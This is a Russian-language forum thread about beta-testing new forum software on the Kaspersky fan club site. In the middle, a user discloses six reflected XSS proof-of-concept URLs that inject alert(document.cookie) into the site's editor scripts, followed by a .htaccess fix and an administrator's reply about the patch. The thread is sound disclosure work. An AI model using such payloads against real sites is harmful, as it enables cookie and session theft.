Перейти к содержанию

Бета-тестирование форума - 2.3.1


Ig0r

Рекомендуемые сообщения

Друзья, предлагаем принять участие в бета-тестировании новой версии форума – 2.3.1.

 

Адрес форума - http://www.kasperskyclub.com/forums/

 

Зайти могут все, кроме обычных пользователей. Им для участия надо подать заявку.

 

Известные ошибки:

  • Нет репутации.

Тестирование завершено.

Ссылка на комментарий
Поделиться на другие сайты

Опа! Только что чат после каждого сообщения выдавал неизвестную ошибку и не отсылал собщения!

post-22-1183017729_thumb.jpg

А потом - посмотрите, где индикатор обновления (gif-ка) крутится!

Ссылка на комментарий
Поделиться на другие сайты

Подаю заявку

Доступ итак открыт.

 

Я тоже подаю заявку!
Подаю заяву

Доступ разрешен.

 

Опа! Только что чат после каждого сообщения выдавал неизвестную ошибку и не отсылал собщения!

А потом - посмотрите, где индикатор обновления (gif-ка) крутится!

Какие сообщения отправлялись? У меня крутилка в MF вертится на месте. На основном форуме в правильном месте?

Ссылка на комментарий
Поделиться на другие сайты

Сообщения? Обычные :huh: Вобще без намёков на искажённый язык. Потом само-собой перестало.

Крутилка отображается нормально на 2.2.2 На 2.3.1 тоже глюк исчез. Не знаю, почему :)

Ссылка на комментарий
Поделиться на другие сайты

Да он кишит уязвимостями! Прошелся две минуты по сайтам специализированным :huh:

 

http://www.kasperskyclub.com/forums/jscripts/folder_rte_files/module_email.php?editorid=";alert(document.cookie);var i="

http://www.kasperskyclub.com/forums/jscripts/folder_rte_files/module_table.php?editorid=%22;alert(document.cookie);var%20i=%22

http://www.kasperskyclub.com/forums/jscripts/folder_rte_files/module_bbcodeloader.php?editorid=alert(document.co%20%20okie);/*&id=*/var%20i=%22

http://www.kasperskyclub.com/forums/jscripts/folder_rte_files/module_div.php?editorid=%22;alert(document.cookie);var%20i=%22

http://www.kasperskyclub.com/forums/jscripts/folder_rte_files/module_link.php?editorid=%22;alert(document.cookie);var%20i=%22

http://www.kasperskyclub.com/forums/jscripts/folder_rte_files/module_email.php?editorid=%22;alert(document.cookie);var%20i=%22

 

Заплатка:

Надо кинуть файл .htaccess в папку /jscripts/folder_rte_files/ с содержанием:

 

Order Deny,Allow
Deny from all

Изменено пользователем radioelectron
Ссылка на комментарий
Поделиться на другие сайты

Да он кишит уязвимостями! Прошелся две минуты по сайтам специализированным :huh:

Спасибо. Но Вы проверяли?

 

Заветная строчка выглядит по-другому:

<?php print '"'.trim( htmlspecialchars( substr( $_REQUEST['editorid'], 0, 30 ) ) ).'";'; ?>

 

В конце мая вышло исправление...

 

Кстати, куки своровать можно, но есть дополнительная защита. :)

 

Кстати 2, особенно интересует слетает ли авторизация.

Ссылка на комментарий
Поделиться на другие сайты

Кстати 2, особенно интересует слетает ли авторизация.

Неа

В конце мая вышло исправление...

Но все-таки, файлик хтаксесс не мешало бы воткнуть в ту папку. Так, на всякий случай :huh:

Ссылка на комментарий
Поделиться на другие сайты

  • 2 weeks later...
Гость
Эта тема закрыта для публикации ответов.
  • Похожий контент

    • Корчагин Степан
      От Корчагин Степан
      Всем привет!
      С этого момента здесь мы будем публиковать новости о бета-тестировании.
      Присоединяйтесь к нашему бета-тестированию на нашем специальном ресурсе (лучше регистрироваться под тем же ником, что и тут), приглашайте своих друзей, помогайте нам создавать лучшее защитное программное обеспечение в мире, получайте клубные баллы и другие подарки от нас.
       
      Последние бета-версии продуктов Касперского для Windows (21.8.4.272) можно получить здесь:
      Kaspersky — https://box.kaspersky.com/d/faa52e0ba68c4c5aaa45/
      Kaspersky VPN — https://box.kaspersky.com/d/cc7a0ae4207148b6a0cf/
      KSOS— https://box.kaspersky.com/d/941e5b357d2d45f39dd4/
      KES— https://box.kaspersky.com/d/dbc8bf07bd8a45a3b0bc/
       
      Пожалуйста, сообщайте об ошибках и отзывах на нашем форуме бета-тестирования:
      Для домашних продуктов (Kaspersky, Kaspersky VPN) - https://eap.kaspersky.com/category/354/home
      Для бизнес-продуктов (KES, KSOS) - https://eap.kaspersky.com/category/356/business

      Информацию о изменении актуальной версии бета-продуктов мы будем публиковать здесь, в следующих обновлениях.
      Увидимся!
    • Elly
      От Elly
      Вопросы по работе форума следует писать сюда. Вопросы по модерированию, согласно правилам, сюда писать не следует.
      Ответ можно получить только на вопрос, который грамотно сформулирован и не нарушает правил\устава форума.
    • MiStr
      От MiStr
      Всем привет! К нам обратились разработчики мобильных продуктов ЛК вот с таким письмом
       
       
      От себя добавлю, что с ответственными за бета-тестирование мобильных продуктов у нас теперь налажены связи. А это значит, что по итогам бета-тестирований мы сможем оперативно начислять клабы, предусмотренные правилами нашей рейтинговой системы
       
      Для того, чтобы среди массы тестеров мы идентифицировали фан-клубовцев, после отправки разработчикам 2-3 багов пишите свой ник в этой теме
    • Val_m
      От Val_m
      Добрый день, зарегистрировался недавно, не дает отправить человеку на форуме личное сообщение с вот такой вот ошибкой:
       

       
      Подскажите, это какое-то ограничение, связанное с защитой от спамеров, ботов и прочего? Через сколько после регистрации эта функция начинает работать? Или дело не в этом?
    • ska79
      От ska79
      Долго наблюдал- заметил следующее:
      Если пользователь регистрируется под никнеймом на английском языке, то с главной страницы форума невозможно открыть его профиль, если регистрация происходит с использованием кириллицы тогда открывается норм.
×
×
  • Создать...